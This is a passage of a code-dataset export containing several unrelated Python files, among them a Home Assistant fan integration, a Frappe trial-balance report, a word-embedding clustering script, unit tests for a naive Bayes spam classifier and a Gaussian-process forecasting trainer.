hass.data[DOMAIN]['configs'].get(config_entry.entry_id, dict(config_entry.data))\n await async_setup_platform(hass, config, async_add_entities)\n\nclass MiotFan(ToggleableMiotDevice, FanEntity):\n def __init__(self, device, config, device_info, hass):\n ToggleableMiotDevice.__init__(self, device, config, device_info, hass)\n self._speed = None\n self._oscillation = None\n \n @property\n def supported_features(self):\n \"\"\"Return the supported features.\"\"\"\n s = 0\n if 'oscillate' in self._mapping:\n s |= SUPPORT_OSCILLATE\n if 'speed' in self._mapping:\n s |= SUPPORT_SET_SPEED\n return s\n\n @property\n def speed_list(self) -> list:\n \"\"\"Get the list of available speeds.\"\"\"\n return list(self._ctrl_params['speed'].keys())\n \n @property\n def speed(self):\n \"\"\"Return the current speed.\"\"\"\n return self._speed\n \n @property\n def oscillating(self):\n \"\"\"Return the oscillation state.\"\"\"\n return self._oscillation\n\n async def async_oscillate(self, oscillating: bool) -> None:\n \"\"\"Set oscillation.\"\"\"\n result = await self.set_property_new(\"oscillate\",self._ctrl_params['oscillate'][oscillating])\n\n if result:\n self._oscillation = True\n self._skip_update = True\n \n async def async_turn_on(self, speed: str = None, **kwargs) -> None:\n \"\"\"Turn on the entity.\"\"\"\n parameters = [{**{'did': \"switch_status\", 'value': self._ctrl_params['switch_status']['power_on']},**(self._mapping['switch_status'])}]\n \n if speed:\n parameters.append({**{'did': \"speed\", 'value': self._ctrl_params['speed'][speed]}, **(self._mapping['speed'])}) \n\n # result = await self._try_command(\n # \"Turning the miio device on failed.\",\n # self._device.send,\n # \"set_properties\",\n # parameters,\n # )\n result = await self.set_property_new(multiparams = parameters)\n if result:\n self._state = True\n self._skip_update = True\n \n async def async_update(self):\n await super().async_update()\n # self._speed = self._ctrl_params['speed'].get(self._state_attrs.get('speed_'))\n try:\n self._speed = self.get_key_by_value(self._ctrl_params['speed'],self._state_attrs.get('speed_'))\n except KeyError:\n pass\n self._oscillation = self._state_attrs.get('oscillate')\n","sub_path":"custom_components/xiaomi_miot_raw/fan.py","file_name":"fan.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"17382588","text":"from random import randint\nfrom time import sleep\ncomputer = randint(0, 10)\nprint('I thought in a number between 0 and 10. Can you guess?')\nsleep(0.5)\nplayer = int(input('What is your guess? '))\ncount = 0\nwhile computer != player:\n if player < computer:\n print('Try a bigger number...')\n player = int(input('Try again: '))\n elif player > computer:\n print('Try a smaller number...')\n player = int(input('Try again: '))\n count += 1\nprint(f'Congratulations! You won me with {count} guesses.')","sub_path":"Python/guessingGame.py","file_name":"guessingGame.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"42907595","text":"from flask_restful import Resource, reqparse\n\nfrom datetime import datetime\n\nfrom summarization.services.summarization_service import SummaryGenerator\nfrom summarization.util.format_key_phrases import format_key_phrases\n\n\nclass SummarizationResource(Resource):\n def __init__(self):\n self.parser = reqparse.RequestParser()\n self.parser.add_argument('full_text', required = True)\n self.parser.add_argument('key_phrases', required=True)\n\n def post(self):\n data = self.parser.parse_args()\n\n try:\n full_text = data['full_text']\n key_phrases = format_key_phrases(data['key_phrases'])\n\n summary = SummaryGenerator(full_text, key_phrases).generate()\n\n return {'summary': summary}\n except:\n return {'message': 'Error in summarizing'}, 400\n","sub_path":"summarization/resources/summarization_resource.py","file_name":"summarization_resource.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"483745840","text":"class Solution:\n def maxNumberOfApples(self, arr: List[int]) -> int:\n arr.sort()\n total, count, i = 5000, 0, 0\n while i < len(arr) and total > 0:\n if total - arr[i] >= 0:\n total -= arr[i]\n i += 1\n count += 1\n else:\n break\n return count\n","sub_path":"python/1196_HowManyApplesCanYouPutIntoTheBasket.py","file_name":"1196_HowManyApplesCanYouPutIntoTheBasket.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"586422792","text":"# Copyright (c) 2013, BS and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe import _, _dict\nimport functools\nfrom frappe.utils import getdate, flt\n\nvalue_fields = (\"opening_debit\", \"opening_credit\", \"debit\",\n \"credit\", \"closing_debit\", \"closing_credit\")\n\n\ndef execute(filters=None):\n if filters and filters.from_date > filters.to_date:\n frappe.throw(_(\"From Date cannot be greater than To Date\"))\n\n data = get_data(filters)\n columns = get_columns()\n print(data)\n\n return columns, data\n\n\ndef filter_accounts(accounts, depth=10):\n parent_children_map = {}\n accounts_by_name = {}\n filtered_accounts = []\n\n for d in accounts:\n accounts_by_name[d.name] = d\n parent_children_map.setdefault(d.parent_account or None, []).append(d)\n\n def add_to_list(parent, level):\n if level < depth:\n children = parent_children_map.get(parent) or []\n\n for child in children:\n child.indent = level\n filtered_accounts.append(child)\n add_to_list(child.name, level + 1)\n\n add_to_list(None, -1)\n\n return filtered_accounts, accounts_by_name, parent_children_map\n\n\ndef get_opening_balances(filters):\n opening = frappe._dict()\n\n gle = frappe.db.sql(\"\"\"\n select\n account, sum(debit) as opening_debit, sum(credit) as opening_credit\n from `tabGL Entry`\n where\n (DATE(transaction_date) >= %(from_date)s)\n group by account\"\"\",\n {\n \"from_date\": filters.from_date,\n },\n as_dict=True)\n\n for d in gle:\n opening.setdefault(d.account, d)\n\n return opening\n\n\ndef set_gl_entries_by_account(from_date, to_date, root_lft, root_rgt, filters):\n gl_entries_by_account = {}\n\n accounts = frappe.db.sql_list(\"\"\"select name from `tabAccounts`\n where lft >= %s and rgt <= %s\"\"\", (root_lft, root_rgt))\n\n gl_filters = {\n \"from_date\": from_date,\n \"to_date\": to_date,\n }\n for key, value in filters.items():\n if value:\n gl_filters.update({\n key: value\n })\n gl_entries = frappe.db.sql(\n \"\"\"\n select \n posting_datetime,transaction_date, account, debit, credit \n from `tabGL Entry`\n where \n account in ({}) \n and DATE(transaction_date) <= %(to_date)s\n order by \n account, DATE(transaction_date)\n \"\"\".format(\", \".join([frappe.db.escape(d) for d in accounts])), gl_filters, as_dict=True)\n\n for entry in gl_entries:\n gl_entries_by_account.setdefault(entry.account, []).append(entry)\n\n return gl_entries_by_account\n\n\ndef calculate_values(accounts, gl_entries_by_account, opening_balances, filters):\n init = {\n \"opening_debit\": 0.0,\n \"opening_credit\": 0.0,\n \"debit\": 0.0,\n \"credit\": 0.0,\n \"closing_debit\": 0.0,\n \"closing_credit\": 0.0\n }\n\n total_row = {\n \"account\": \"'\" + _(\"Total\") + \"'\",\n \"account_name\": \"'\" + _(\"Total\") + \"'\",\n \"warn_if_negative\": True,\n \"opening_debit\": 0.0,\n \"opening_credit\": 0.0,\n \"debit\": 0.0,\n \"credit\": 0.0,\n \"closing_debit\": 0.0,\n \"closing_credit\": 0.0,\n \"parent_account\": None,\n \"indent\": 0,\n \"has_value\": True,\n }\n\n for d in accounts:\n d.update(init.copy())\n\n d[\"opening_debit\"] = opening_balances.get(\n d.name, {}).get(\"opening_debit\", 0)\n d[\"opening_credit\"] = opening_balances.get(\n d.name, {}).get(\"opening_credit\", 0)\n\n for entry in gl_entries_by_account.get(d.name, []):\n d[\"debit\"] += flt(entry.debit)\n d[\"credit\"] += flt(entry.credit)\n\n some_value = flt(d[\"debit\"]) - flt(d[\"credit\"])\n if some_value > 0:\n d[\"closing_debit\"] += abs(some_value)\n else:\n d[\"closing_credit\"] += abs(some_value)\n \n\n total_row[\"debit\"] += d[\"debit\"]\n total_row[\"credit\"] += d[\"credit\"]\n\n return total_row\n\n\ndef accumulate_values_into_parents(accounts, accounts_by_name):\n for d in reversed(accounts):\n if d.parent_account:\n for key in value_fields:\n accounts_by_name[d.parent_account][key] += d[key]\n \n return accounts\n\n\ndef prepare_data(accounts, filters, total_row, parent_children_map):\n data = []\n for d in accounts:\n row = {\n \"account\": d.name,\n \"parent_account\": d.parent_account,\n \"indent\": d.indent,\n \"from_date\": filters.from_date,\n \"to_date\": filters.to_date,\n \"account_name\": d.account_name\n }\n\n d[\"closing_debit\"] += d[\"opening_debit\"]\n d[\"closing_credit\"] += d[\"opening_credit\"]\n\n for key in value_fields:\n row[key] = d.get(key, 0.0)\n\n data.append(row)\n \n data += [{}, total_row]\n \n return data[1:]\n\n\ndef get_data(filters):\n if filters.fiscal_year:\n fiscal_year = frappe.get_doc('Fiscal Year', filters.fiscal_year)\n filters.from_date, filters.to_date = str(fiscal_year.start_date), str(fiscal_year.end_date)\n \n accounts = frappe.db.sql(\n \"\"\" select \n name, account_number,parent_accounts, account_name, lft, rgt\n from `tabAccounts` \n {}\n order by lft\n \"\"\".format(\"where account_name = '{}'\".format(filters.account) if filters.account else ' ')\n , as_dict=True)\n print(accounts)\n\n min_lft, max_rgt = frappe.db.sql(r\"select min(lft), max(rgt) from `tabAccounts`\")[0]\n\n accounts, accounts_by_name, parent_children_map = filter_accounts(accounts)\n\n opening_balances = get_opening_balances(filters)\n\n gl_entries_by_account = set_gl_entries_by_account(filters.from_date, filters.to_date,\n min_lft, max_rgt, filters)\n \n total_row = calculate_values(accounts, gl_entries_by_account, opening_balances, filters)\n \n accounts = accumulate_values_into_parents(accounts, accounts_by_name)\n print(accounts)\n\n data = prepare_data(accounts, filters, total_row, parent_children_map)\n \n return data\n\n\ndef get_columns():\n return [\n {\n \"fieldname\": \"account\",\n \"label\": _(\"Account\"),\n \"fieldtype\": \"Link\",\n \"options\": \"Accounts\",\n \"width\": 300\n },\n {\n \"fieldname\": \"opening_debit\",\n \"label\": _(\"Opening (Dr)\"),\n \"fieldtype\": \"Currency\",\n \"options\": \"currency\",\n \"width\": 120\n },\n {\n \"fieldname\": \"opening_credit\",\n \"label\": _(\"Opening (Cr)\"),\n \"fieldtype\": \"Currency\",\n \"options\": \"currency\",\n \"width\": 120\n },\n {\n \"fieldname\": \"debit\",\n \"label\": _(\"Debit\"),\n \"fieldtype\": \"Currency\",\n \"options\": \"currency\",\n \"width\": 120\n },\n {\n \"fieldname\": \"credit\",\n \"label\": _(\"Credit\"),\n \"fieldtype\": \"Currency\",\n \"options\": \"currency\",\n \"width\": 120\n },\n {\n \"fieldname\": \"closing_debit\",\n \"label\": _(\"Closing (Dr)\"),\n \"fieldtype\": \"Currency\",\n \"options\": \"currency\",\n \"width\": 120\n },\n {\n \"fieldname\": \"closing_credit\",\n \"label\": _(\"Closing (Cr)\"),\n \"fieldtype\": \"Currency\",\n \"options\": \"currency\",\n \"width\": 120\n }\n ]\n","sub_path":"accounting_app/accounting_app/report/trial_balance/trial_balance.py","file_name":"trial_balance.py","file_ext":"py","file_size_in_byte":7677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"546975417","text":"from sklearn.cluster import KMeans\nfrom sklearn.cluster import DBSCAN\nfrom sklearn.mixture import GaussianMixture, GMM\nimport numpy as np\nimport pickle\nimport detectNLP\nimport data_helpers\nimport gensim\nfrom GloVe_tensorflow import *\nfrom os.path import exists, join\nimport word_cloud\n\n#can be \"GloVe\", \"pretrainedWord2vec\" or \"category_trainedWord2vec\"\nwordvecType = \"pretrainedWord2vec\"\n\n#can be \"GaussianMixture\", \"KMeans\", \"DBSCAN\" or \"KMeansDBSCAN\"\nclusteringType = \"GaussianMixture\"\n\n#set the number of clusters for KMeans\nn_clusters = 10\n\nX = []\nwords = []\n\ncategory = \"Hotels\"\nwith open(\"data/Las_Vegas-\" + category + \".p\", \"rb\") as f:\n reviews, business_id2business, user_id2user = pickle.load(f)\ndel user_id2user\ndel business_id2business\n\nword2count = dict()\ncorpus = []\nfor review in reviews:\n corpus.append(review[\"words\"])\n for word in set(review[\"words\"]):\n if word not in word2count:\n word2count[word] = 0\n word2count[word] += 1\n\ndel reviews\n\nif wordvecType == \"category_trainedWord2vec\":\n model = gensim.models.word2vec.Word2Vec(corpus,size=300, iter=100)\n word2vec = model.wv\nelif wordvecType == \"GloVe\":\n if exists(\"data/GloVe/\" + category + \".bin\"):\n with open(\"data/GloVe/\" + category + \".bin\", 'rb') as vector_f:\n word2vec = pickle.load(vector_f)\n else:\n model = GloVeModel(embedding_size=300, context_size=5)\n model.fit_to_corpus(corpus)\n print(\"Training\")\n model.train(num_epochs=100)\n word2vec = dict()\n\n for text in corpus:\n for word in text:\n if word not in word2vec:\n try:\n word2vec[word] = model.embedding_for(word)\n except Exception:\n continue\n\n with open(\"data/GloVe/\" + category + \".bin\", 'wb+') as vector_f:\n pickle.dump(word2vec, vector_f)\n\nelif wordvecType == \"pretrainedWord2vec\":\n word2vec = dict()\n for word in word2count:\n word2vec[word] = detectNLP.get_average_wordvec(word)\nelse:\n raise Exception(\"Invalid wordvecType\")\n\n\ncnt = 0\nfor word in word2count:\n try:\n wordVec = word2vec[word]\n if not np.isnan(wordVec).any():\n X.append(wordVec)\n words.append(word)\n except Exception:\n continue\n\nif clusteringType==\"KMeans\":\n classifier = KMeans(n_clusters=n_clusters)\n predictions = classifier.fit_predict(X)\nelif clusteringType == \"GaussianMixture\":\n classifier = GMM(n_components=1000, min_covar=0.0001)\n classifier.fit(X)\n predictions = classifier.predict(X)\nelif clusteringType==\"DBSCAN\":\n classifier = DBSCAN(eps = 5, min_samples=100)\n predictions = classifier.fit_predict(X)\nelif clusteringType==\"KMeansDBSCAN\":\n classifier = KMeans(n_clusters=n_clusters)\n predictions = classifier.fit_predict(X)\n subsets = [[]] * 10\n for i,prediction in enumerate(predictions):\n x = X[i]\n subsets[prediction].append(x)\n\n predictions = []\n current_cluster = 0\n for subset in subsets:\n classifier = DBSCAN(eps = 5\n , min_samples=100)\n subpredictions = classifier.fit_predict(X)\n predictions.extend(map(lambda x: x + current_cluster, subpredictions))\n max_cluster = np.max(subpredictions)\n current_cluster += max_cluster\nelse:\n raise Exception(\"Invalid clusteringType\")\n\n\nword2cluster = dict()\n\ncluster_texts = dict()\nrows = [[\"Word\",\"Cluster\"]]\nfor i, word in enumerate(words):\n clusterNum = predictions[i]\n word2cluster[word] = clusterNum\n if clusterNum not in cluster_texts:\n cluster_texts[clusterNum] = []\n cluster_texts[clusterNum].extend([word]*word2count[word])\n\n rows.append([word, clusterNum])\n\nfor cluster in cluster_texts:\n text = \" \".join(cluster_texts[cluster])\n output_filename = \"images/\"+category+\"_\"+wordvecType+\"_\"+clusteringType+\"_cluster\"+str(cluster)+\".png\"\n if category == \"Hotels\":\n mask_filename = \"images/hotel3.jpg\"\n elif category == \"Food\":\n mask_filename = \"images/plate_gray.png\"\n\n word_cloud.make_word_cloud(text,output_filename,mask_filename)\n\nfilename = \"data/\" + wordvecType + \"-\" + clusteringType + \"-\" + category+\"_word2cluster.csv\"\ndata_helpers.write_csv(filename, rows)\ndata_helpers.write_csv_to_xlsx(filename)\n","sub_path":"word2vecClustering.py","file_name":"word2vecClustering.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"479507562","text":"from django.urls import path\n\nfrom .views import CreateUserView, login_user, logut_user\n\n\nurlpatterns =[\n path('register', CreateUserView.as_view(), name='register'),\n path('login', login_user, name='login'),\n path('logout', logut_user, name='logout'),\n]","sub_path":"CustomUser/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"491828425","text":"from hw2 import *\nimport hw2\nimport math\nimport unittest, sys, io, os, random, pickle\nfrom unittest.mock import patch\nfrom contextlib import redirect_stdout, redirect_stderr\nfrom compare_pandas import compare_lists, compare_los\n\n\"\"\"\nRewrite these tests so that use only a portion of the corpus for\nthe sake of speed.\n\"\"\"\n\n\"\"\"\nThese tests depend on your code passing the previous tests, \nso get them working in the order that they are tested.\n\nMaking the classifier takes a long time, so in a lot of these\ntests, I am doing odd things to bypass having to create a classifier\nto access the methods.\n\nFiles needed:\nhw2.py\nget_data.py - necessary to download the data\nlabeled_data_test.pkl, labeled_data_train.pkl, word_counts_ld_train.pkl\nword_probs_ld_train1.pkl, word_probs_ld_train1.pkl\nmain_out_correct.txt is NOT NEEDED\n\"\"\"\n\nclass TestHw2(unittest.TestCase):\n \n def test_parse_line(self):\n line = 'List-Post: '\n self.assertEqual('', LabeledData.parse_line(line))\n line = ' Message-ID: <1029945287.4797.TMDA@deepeddy.vircio.com>'\n self.assertEqual('', LabeledData.parse_line(line))\n line = ' : Message-ID: <1029945287.4797.TMDA@deepeddy.vircio.com>'\n parsed = ': Message-ID: <1029945287.4797.TMDA@deepeddy.vircio.com>'\n self.assertEqual(parsed, LabeledData.parse_line(line))\n line = 'xxx : Message-ID: <1029945287.4797.TMDA@deepeddy.vircio.com>'\n self.assertEqual('', LabeledData.parse_line(line))\n line = '18:19:04 Marking 1 hits' # oops! Not a header line. Oh well.\n self.assertEqual('', LabeledData.parse_line(line))\n line = ' hey Message-ID: <1029945287.4797.TMDA@deepeddy.vircio.com> '\n parsed = 'hey Message-ID: <1029945287.4797.TMDA@deepeddy.vircio.com>'\n self.assertEqual(parsed, LabeledData.parse_line(line))\n\n def test_parse_message(self):\n fp = io.StringIO(\"from: nowhere\\nto: nobody\\n\\nWhat the...\\nI'm confused\")\n correct = \"What the... I'm confused\"\n with patch('builtins.open', side_effect=[fp]):\n self.assertEqual(correct, LabeledData.parse_message('dne.instance', 'dne.nada'))\n\n fp = io.StringIO(\"from nowhere\\nto: nobody\\n\\nWhat the...\\nI'm confused\")\n correct = \"What the... I'm confused\"\n with patch('builtins.open', side_effect=[fp]):\n self.assertEqual(correct, LabeledData.parse_message('dne.instance', 'dne.nada'))\n\n fp = io.StringIO(\"from nowhere\\nSubject:Hey Sucka\\nto: nobody\\n\\nWhat the...\\nI'm confused\")\n correct = \"Hey Sucka What the... I'm confused\"\n with patch('builtins.open', side_effect=[fp]):\n self.assertEqual(correct, LabeledData.parse_message('dne.instance', 'dne.nada'))\n\n fp = io.StringIO(\"from nowhere\\nSubject:Hey Sucka\\nto: nobody\\n\\n\" + \n \" Subject: re: What the...\\nI'm confused\")\n correct = \"Hey Sucka I'm confused\"\n with patch('builtins.open', side_effect=[fp]):\n self.assertEqual(correct, LabeledData.parse_message('dne.instance', 'dne.nada'))\n \n fp = io.StringIO(\"from nowhere\\nSubject: re: re: Hey Sucka\\nto: nobody\\n\\n\" + \n \" Subject: re: What the...\\nI'm confused\")\n correct = \"Hey Sucka I'm confused\"\n with patch('builtins.open', side_effect=[fp]):\n self.assertEqual(correct, LabeledData.parse_message('dne.instance', 'dne.nada'))\n \n fp = io.StringIO(\"from nowhere\\nSubject: Re: Re: Hey Sucka\\nto: nobody\\n\\n\" + \n \" Subject: re: What the...\\nI'm confused\")\n correct = \"Hey Sucka I'm confused\"\n with patch('builtins.open', side_effect=[fp]):\n self.assertEqual(correct, LabeledData.parse_message('dne.instance', 'dne.nada'))\n \n def test_init_LabeledData(self):\n with patch('os.listdir', side_effect=[['hf1', 'hf2', 'hf3'], ['spf1', 'spf2']]):\n with patch('hw2.LabeledData.parse_message', side_effect=['ham1', 'ham2', 'ham3', 'spam1', 'spam2']):\n ld = LabeledData('hp', 'sp')\n self.assertEqual(['ham1', 'ham2', 'ham3', 'spam1', 'spam2'], ld.X)\n self.assertEqual([0, 0, 0, 1, 1], ld.y)\n with open('labeled_data_train.pkl', 'rb') as fp:\n correct = pickle.load(fp)\n student = LabeledData()\n self.assertTrue(compare_los(correct.X, student.X, skip_str_lens=True))\n self.assertTrue(compare_lists(correct.y, student.y))\n with open('labeled_data_test.pkl', 'rb') as fp:\n correct = pickle.load(fp)\n student = LabeledData('data/2003/easy_ham', 'data/2003/spam')\n self.assertTrue(compare_los(correct.X, student.X, skip_str_lens=True))\n self.assertTrue(compare_lists(correct.y, student.y))\n \n def test_tokenize(self):\n class HasStemmer:\n def __init__(self):\n self.stemmer = SnowballStemmer(\"english\")\n nada = HasStemmer()\n\n correct = {'tell', 'ca', 'want', 's'}\n text = \"I can't tell you 123, how567^%$ much I don't want to do this s#@!\"\n self.assertEqual(correct, NaiveBayesClassifier.tokenize(nada, text))\n\n text = \"WHAT IS GOING ON????\"\n self.assertEqual(set(), NaiveBayesClassifier.tokenize(nada, text))\n\n correct = {'stopword', 'word'}\n text = \"MUST FIND A WORD THAT ISN'T A STOPWORD. WHAT IS IT?\"\n self.assertEqual(correct, NaiveBayesClassifier.tokenize(nada, text))\n\n correct = {'swimmer', 'fast', 'fastest', 'swim', 'faster'} # this stemmer sucks\n text = \"swim swimmer swimmer's swimming fast faster fastest\"\n self.assertEqual(correct, NaiveBayesClassifier.tokenize(nada, text))\n\n def test_count_words(self):\n class HasLD:\n def __init__(self, ld):\n self.labeled_data = ld\n self.stemmer = SnowballStemmer(\"english\")\n\n HasLD.tokenize = NaiveBayesClassifier.tokenize\n\n X = ['ha hsa, hb', 'sa, hsa$ sb', 'ha, hsa, hc']\n y = [0, 1, 0]\n ld = LabeledData(X=X, y=y)\n nada = HasLD(ld)\n\n correct = {'ha': [0, 2], 'hsa': [1, 2], 'hb': [0, 1], 'sa': [1, 0], \n 'sb': [1, 0], 'hc': [0, 1]}\n self.assertEqual(correct, NaiveBayesClassifier.count_words(nada))\n\n with open('word_counts_ld_train.pkl', 'rb') as fp:\n with open('labeled_data_train.pkl', 'rb') as fp2:\n correct = pickle.load(fp)\n ld = pickle.load(fp2)\n nada = HasLD(ld)\n self.assertEqual(correct, NaiveBayesClassifier.count_words(nada))\n\n def test_init_NaiveBayesClassifier(self):\n with open('labeled_data_train.pkl', 'rb') as fp:\n ld = pickle.load(fp)\n\n classifier = NaiveBayesClassifier(ld, max_words=25)\n with open('word_probs_ld_train1.pkl', 'rb') as fp:\n word_probs = pickle.load(fp)\n self.assertTrue(classifier.stemmer)\n self.assertEqual(ld, classifier.labeled_data)\n self.assertEqual(25, classifier.max_words)\n self.assertEqual(word_probs, classifier.word_probs)\n\n classifier = NaiveBayesClassifier(ld, 1)\n with open('word_probs_ld_train2.pkl', 'rb') as fp:\n word_probs = pickle.load(fp)\n self.assertEqual(50, classifier.max_words)\n self.assertEqual(word_probs, classifier.word_probs)\n\n def test_get_tokens(self):\n class HasMaxWords:\n def __init__(self, max_words=10):\n self.max_words = max_words\n\n random.seed(25)\n message = {'please', 'this', 'test', 'must', 'end'}\n correct = ['test', 'end', 'this']\n nada = HasMaxWords(3)\n self.assertEqual(correct, NaiveBayesClassifier.get_tokens(nada, message))\n\n correct = ['please', 'test', 'end', 'must', 'this']\n nada = HasMaxWords(7)\n self.assertEqual(correct, NaiveBayesClassifier.get_tokens(nada, message))\n\n correct = ['please', 'test']\n nada = HasMaxWords(2)\n self.assertEqual(correct, NaiveBayesClassifier.get_tokens(nada, message))\n\n def test_spam_probability(self):\n with open('labeled_data_train.pkl', 'rb') as fp:\n ld = pickle.load(fp)\n\n classifier = NaiveBayesClassifier(ld, max_words=25)\n message = (\"This message is completely legit. It is full of ham and good \" +\n \"thoughts and ideas and excellent suggestions.\")\n self.assertTrue(math.isclose(0.014279741503990657, classifier.spam_probability(message)))\n \n def test_classify(self):\n class HasSP:\n def __init__(self):\n self.gen = (i for i in [-1, 0, 0.49, 0.5, 0.51, 1, 2])\n\n def spam_probability(self, message):\n return next(self.gen)\n\n nada = HasSP()\n self.assertFalse(NaiveBayesClassifier.classify(nada, 'message'))\n self.assertFalse(NaiveBayesClassifier.classify(nada, 'message'))\n self.assertFalse(NaiveBayesClassifier.classify(nada, 'message'))\n self.assertTrue(NaiveBayesClassifier.classify(nada, 'message'))\n self.assertTrue(NaiveBayesClassifier.classify(nada, 'message'))\n self.assertTrue(NaiveBayesClassifier.classify(nada, 'message'))\n self.assertTrue(NaiveBayesClassifier.classify(nada, 'message'))\n\n def test_predict(self):\n class HasClassify:\n def __init__(self):\n self.gen = (b for b in [True, False, False, True])\n\n def classify(self, message):\n return next(self.gen)\n\n nada = HasClassify()\n X = ['m1', 'm2', 'm3', 'm4']\n correct = [True, False, False, True]\n self.assertEqual(correct, NaiveBayesClassifier.predict(nada, X))\n\n def test_main(self):\n correct = \"[[2016 485]\\n [ 0 501]]\\naccuracy: 83.84%\\n\"\n #correct = \"[[2008 493]\\n [ 0 501]]\\naccuracy: 83.58%\\n\"\n with io.StringIO() as buf, redirect_stdout(buf):\n random.seed(25)\n hw2.main()\n self.assertEqual(correct, buf.getvalue())\n\n\n \"\"\" \n def test_count_words(self):\n '''\n This is the most f***ed up test ever. There must be an easier way.\n A much, much easier way. Ok, found it, but keeping this because it's such a \n ridiculous work around.\n '''\n class HasStemmer:\n def __init__(self):\n self.stemmer = SnowballStemmer(\"english\")\n \n class HasLD:\n def __init__(self, ld):\n self.labeled_data = ld\n \n def tokenize(self, message):\n nada = HasStemmer()\n return hw2.NaiveBayesClassifier.tokenize(nada, message)\n\n X = ['ha hsa, hb', 'sa, hsa$ sb', 'ha, hsa, hc']\n y = [0, 1, 0]\n ld = LabeledData(X=X, y=y)\n nada = HasLD(ld)\n\n correct = {'ha': [0, 2], 'hsa': [1, 2], 'hb': [0, 1], 'sa': [1, 0], \n 'sb': [1, 0], 'hc': [0, 1]}\n self.assertEqual(correct, dict(hw2.NaiveBayesClassifier.count_words(nada)))\n \"\"\" \n\nif __name__ == \"__main__\":\n test = unittest.defaultTestLoader.loadTestsFromTestCase(TestHw2)\n results = unittest.TextTestRunner().run(test)\n tests_run = results.testsRun\n failures = len(results.failures)\n errors = len(results.errors)\n sys.stdout = sys.__stdout__\n print('Correctness score = ', str((tests_run - errors - failures) / tests_run * 100) + '%')\n","sub_path":"hw2/hw2_test.py","file_name":"hw2_test.py","file_ext":"py","file_size_in_byte":11474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"113264932","text":"import time\n\nimport gpytorch\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport torch\nfrom gpytorch import mlls\n\nfrom ts.benchmark.model import SpectralMixtureGPModel\nfrom ts.utils.loss_modules import sMAPE\n\n\nclass Trainer:\n def __init__(self, model_name, dataloader, run_id, add_run_id, config, csv_path, figure_path):\n super(Trainer, self).__init__()\n self.model_name = model_name\n self.config = config\n self.data_loader = dataloader\n self.run_id = str(run_id)\n self.add_run_id = add_run_id\n self.csv_save_path = csv_path\n self.figure_path = figure_path\n\n def train(self):\n self.figure_path.mkdir(parents=True, exist_ok=True)\n start_time = time.time()\n ts_label = self.config[\"sample_ids\"][0]\n (train, val, test, info_cat, ts_labels, idx) = next(iter(self.data_loader))\n\n data_y = np.squeeze(torch.cat((train, val), dim=1))\n N_samples = min(self.config[\"min_samples\"], data_y.shape[0])\n sample_indices = np.random.choice(data_y.shape[0], N_samples, replace=False)\n data_x = np.arange(data_y.shape[0], dtype=float)\n train_x = torch.from_numpy(data_x[sample_indices]).float()\n train_y = data_y[sample_indices]\n\n likelihood = gpytorch.likelihoods.GaussianLikelihood()\n model = SpectralMixtureGPModel(train_x, train_y, likelihood)\n model.train()\n likelihood.train()\n mll = mlls.ExactMarginalLogLikelihood(model.likelihood, model)\n optimizer = torch.optim.Adam(model.parameters(), lr=self.config[\"learning_rate\"])\n\n training_iter = 100\n for i in range(training_iter):\n optimizer.zero_grad()\n forecast = model(train_x)\n loss = - mll(forecast, train_y)\n loss.backward()\n optimizer.step()\n print('Iter %d/%d - Loss: %.3f noise: %.3f' % (\n i + 1, training_iter, loss.item(),\n model.likelihood.noise.item()\n ))\n\n test_data_y = np.squeeze(torch.cat((train, val, test), axis=1))\n test_data_x = np.arange(test_data_y.shape[0], dtype=float)\n test_x = torch.from_numpy(test_data_x).float()\n\n # Get into evaluation (predictive posterior) mode\n model.eval()\n likelihood.eval()\n\n # The gpytorch.settings.fast_pred_var flag activates LOVE (for fast variances)\n with torch.no_grad(), gpytorch.settings.fast_pred_var():\n # Make predictions\n\n\n observed_pred = likelihood(model(test_x))\n\n # Initialize plot\n f, ax = plt.subplots(figsize=(17, 4))\n\n # Get upper and lower confidence bounds\n lower, upper = observed_pred.confidence_region()\n # Plot training data\n ax.plot(test_data_x, test_data_y, \"b\")\n #ax.plot(data_x, data_y, \"k\")\n ax.plot(train_x.numpy(), train_y.numpy(), \"k*\")\n # Plot predictive means as blue line\n ax.plot(test_x.numpy(), observed_pred.mean.numpy(), \"r\")\n # Shade between the lower and upper confidence bounds\n ax.fill_between(test_x.numpy(), lower.numpy(), upper.numpy(), alpha=0.5)\n ax.legend([\"Truth\", \"Samples\", \"Mean\", \"Confidence\"])\n ax.set_xlabel(\"Time\")\n ax.set_ylabel(\"Observations\")\n mape = sMAPE(observed_pred.mean[-self.config[\"output_size\"]:],\n test_data_y[-self.config[\"output_size\"]:], self.config[\"output_size\"])\n ax.set_title(\"Time Series:{}, MAPE:{:8.2f}, N samples:{}\".format(ts_label, mape, N_samples))\n #plt.show()\n plt.tight_layout()\n sns.despine()\n plt.savefig(self.figure_path / (ts_label + \"_time_series.eps\"), bbox_inches=\"tight\", format=\"eps\")\n\n print(\"Total Training in mins: %5.2f\" % ((time.time() - start_time) / 60))\n","sub_path":"ts/benchmark/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"87517189","text":"#!/usr/bin/python\r\n#\r\n# Copyright (c) 2020 GuopengLin, (@t-glin)\r\n#\r\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\r\n\r\nfrom __future__ import absolute_import, division, 